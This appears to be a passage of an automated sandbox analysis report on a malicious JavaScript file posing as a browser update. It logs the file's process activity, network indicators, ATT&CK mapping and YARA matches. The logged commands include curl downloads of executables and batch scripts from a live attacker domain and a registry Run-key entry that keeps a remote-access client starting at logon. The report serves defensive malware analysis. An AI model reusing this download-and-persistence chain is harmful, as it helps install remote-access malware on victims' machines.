MnytFlewxJkeoyjJmgrYHHooXLgqAOqyPwGvZZfmexekUKjBOKtvsdAYKICwdUttxFhRvULgnvpoOzBeHZKHDDcMZgxMWWHgpBBoliYTwvexzytpZWHYLrLqfaIMZPUBGwSMVkkYFidAsDcxrhkpdFhpqrqTnP
                                Source: TCCTL32.DLL.15.drBinary or memory string: VMWare
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccTsrtNljgoqFiujCcIVRSnZQqprUIMkWsCVAGfPJTVnFHQdwYIoWdRlGOkVkItlXgkvcjGBvQoTHdvcBsXwdwqHbnwcopllQxntpInZhvLKQrDqNHytFTYVOdvwMlFqAsdHJBtYDwTfvZdEGTpkVzHNxtFpgLJeOUcsxZFxChQzNVcfVzgqGLESHWkrbWIgNPVbaxfhDpYzTsFBtugStCfBoQtXRTctVpzooAKYIAITkZrfEkWKHHSDOuiWkxmNstUKaHUcluKWTqJJKgsLsGqgAYgSSJKnBCJQBizVnnivxFXDKfeFPzYqxUkocoOBnEjzpXWHtjzgyuqacuRdpCYPdABXMrKuZlDTtOzgEaKStPmkdvePmCAgQHIxbJhlponzVukWlMiTGpVoYuJYVZURtCjMFUMoZgOFtAfZlDRdRFvgeAGGrkJOwTEDUkOTmWtoOUDmpaaYAZTeQdkHSfPShZVNWkpTmIemzCFMakDtUbPAgTfbXyQZhURcBRfhmGJQaeFfawTwTUeWtavLMIUMMfBdsrfGEWtLkdTxvHTVgSMWEPrrjpZAMlelKHoLLaccbegfkNakJOZHpaEFzPgZeMqqDyhiiMKJQzOJgCtTzdgrHKblTvtWXezuivNPrJQdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtp=
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AsdHJBtYDwTfvZdEGTpkVzHNxtFpgLJeOUcsxZFxChQzNVcfVzgqGLESHWkrbWIgNPVbaxfhDpYzTsFBtugStCfBoQtXRTctVpzooAKYIAITkZrfEkWKHHSDOuiWkxmNstUKaHUcluKWTqJJKgsLsGqgAYgSSJKnBCJQBizVnnivxFXDKfeFPzYqxUkocoOBnEjzpXWHtjzgyuqacuRdpCYPdABXMrKuZlDTtOzgEaKStPmkdvePmCAgQHIxbJhlponzVukWlMiTGpVoYuJYVZURtCjMFUMoZgOFtAfZlDRdRFvgeAGGrkJOwTEDUkOTmWtoOUDmpaaYAZTeQdkHSfPShZVNWkpTmIemzCFMakDtUbPAgTfbXyQZhURcBRfhmGJQaeFfawTwTUeWtavLMIUMMfBdsrfGEWtLkdTxvHTVgSMWEPrrjpZAMlelKHoLLaccbegfkNakJOZHpaEFzPgZeMqqDyhiiMKJQzOJgCtTzdgrHKblTvtWXezuivNPrJQdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHz0
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLWCGuePwQmhQjPWSKyOTACQnZOceLRMTKCUHgKgPOmsWGXzTYFfDxBgKxZbSMseBylhoapawwsfWYhnzTuJdQztpzWtBCyleixBULjHVfdcnhMtDGCYuSFkAMMDFtfQueylGkjhAWAzREGSIiaPKbJOWImdmEThhUqibHZRFTqqqxplJZJZWDZSxvYKjWRVNoosxOpshLZUddSjyTdOSXKVfKOAySOHjfzZzhFKXAcejtuRFkMwZYXYuggnomefyCxCRDLOlQwPxpbErNeyUIsdDhqWnedWSVZFXwHyoxqMrktquZDjVnAQdZioZxxqjupWNvOeRqTbDcywhtixpLeemSpiJWaiVcGwhlpluWxtdKzcgxFYNnVlTMkvqpAfMdppwKkmfvoecyzaGKRTAzaizDhwZnuILcJkfuNcwhfGufznrTnQyFJBjUndaRWEbhHsPwfKRorJSUKyLFfqtHQzXbeBQFfXVnyxTMDoaVvTfiKmjtsSYbAfTFsREmtmgdjvkRqQavDrGUcqVBWnnfnjjYztkgdmJGHVCiTgpmPWxSQXesVxtICEpFUuWDvHXUeRwynwkckqBvnPeEmwyEagIgDLmkbqKNHzEbrgMuadbwuolGhGMTOCcTCEVpPRjjlTRurwGUadEvwChbgBWHDoqNMFWSlUVqumvmSHcYMGcGyckQcMUjXJSzlmWBVOBWpwbXtfIFTBAqDLBZOVentIvIYWBSxMnytFlewxJkeoyjJmgrYHHooXLgqAOqyPwGvZZfmexekUKjBOKtvsdAYKICwdUttxFhRvULgnvpoOzBeHZKHDDcMZgxMWWHgpBBoliYTwvexzytpZWHYLrLqfaIMZPUBGwSMVkkYFidAsDcxrhkpdFhpqrqTnPZXoBBlAZBQQEyLXkqdKNMmHjxKuvfMlaETITiejydzhJhusVyhVzifpvrXQIpGJeeQrkIZqdSYVAsnQGlcGwVXIanWDlsGSwHKcCvdJdLlyKQcEgkkCdYImqkEkOCYFN
                                Source: client32.exe, 00000012.00000003.521524355.000000000648F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.519208890.000000000648F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995332303.000000000648E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                                Source: curl.exe, 00000008.00000003.489935316.000001F7F5AA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_00471C24
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046E6AA SetUnhandledExceptionFilter,15_2_0046E6AA
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046E6BC SetUnhandledExceptionFilter,15_2_0046E6BC

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeDomain query: mangoairsoft.com
                                Source: C:\Windows\System32\wscript.exeDomain query: magydostravel.com
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.127.230.147 443Jump to behavior
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.9.147.166 443Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//wtgfOhpYJsY.batJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWnd
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Progman
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040C756 GetSystemTime,SystemTimeToFileTime,15_2_0040C756
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046CF4C EntryPoint,GetVersion,GetCommandLineA,15_2_0046CF4C
                                Source: Yara matchFile source: 18.2.client32.exe.be0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.73b70000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.be0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.73b70000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.73b70000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.6fbd0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.6f9c0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.client32.exe.be0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.client32.exe.be0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.22cb6c8.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.0.client32.exe.be0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.6fbd0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.be0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.6fbd0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.27763f8.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.22bbd50.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23e5280.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23d8790.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.22cb6c8.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23e0908.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23e5280.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000015.00000000.529209047.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.530355277.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.995977904.000000006FA00000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000000.511172990.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.994683044.00000000034E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.994683044.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.994296393.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000000.509036667.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.512939596.0000000000BE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 7zz.exe PID: 3320, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5584, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3308, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4956, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                Valid Accounts1
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		Exfiltration Over Other Network Medium1
                                Ingress Tool Transfer                                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                                Default Accounts221
                                Scripting                                		1
                                Registry Run Keys / Startup Folder                                		112
                                Process Injection                                		221
                                Scripting                                		LSASS Memory3
                                File and Directory Discovery                                		Remote Desktop Protocol1
                                Input Capture                                		Exfiltration Over Bluetooth11
                                Encrypted Channel                                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                                Domain Accounts1
                                Native API                                		Logon Script (Windows)1
                                Registry Run Keys / Startup Folder                                		4
                                Obfuscated Files or Information                                		Security Account Manager25
                                System Information Discovery                                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
                                Non-Standard Port                                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local Accounts1
                                Command and Scripting Interpreter                                		Logon Script (Mac)Logon Script (Mac)1
                                Software Packing                                		NTDS11
                                Security Software Discovery                                		Distributed Component Object ModelInput CaptureScheduled Transfer3
                                Non-Application Layer Protocol                                		SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets2
                                Virtualization/Sandbox Evasion                                		SSHKeyloggingData Transfer Size Limits14
                                Application Layer Protocol                                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common1
                                Masquerading                                		Cached Domain Credentials1
                                Process Discovery                                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                                Modify Registry                                		DCSync1
                                Remote System Discovery                                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)112
                                Process Injection                                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1284202 Sample: Browser_update16.0.5836.js Startdate: 02/08/2023 Architecture: WINDOWS Score: 92 88 Snort IDS alert for network traffic 2->88 90 Multi AV Scanner detection for domain / URL 2->90 92 Antivirus detection for URL or domain 2->92 94 Uses known network protocols on non-standard ports 2->94 9 wscript.exe 15 2->9         started        13 client32.exe 2->13         started        15 client32.exe 2->15         started        process3 dnsIp4 84 magydostravel.com 185.9.147.166, 443, 49705 DHUBRU Russian Federation 9->84 86 mangoairsoft.com 188.127.230.147, 443, 49706, 49707 DHUBRU Russian Federation 9->86 102 System process connects to network (likely due to code injection or exploit) 9->102 104 JScript performs obfuscated calls to suspicious functions 9->104 17 cmd.exe 7 9->17         started        signatures5 process6 file7 56 C:\Users\user\AppData\Local\Temp\b3.vbs, ASCII 17->56 dropped 58 C:\Users\user\AppData\Local\Temp\b2.vbs, ASCII 17->58 dropped 60 C:\Users\user\AppData\Local\Temp\b1.vbs, ASCII 17->60 dropped 96 Command shell drops VBS files 17->96 98 Uses cmd line tools excessively to alter registry or file data 17->98 21 cmd.exe 17->21         started        24 cmd.exe 1 17->24         started        26 cmd.exe 1 17->26         started        28 2 other processes 17->28 signatures8 process9 signatures10 100 Uses cmd line tools excessively to alter registry or file data 21->100 30 cmd.exe 1 21->30         started        32 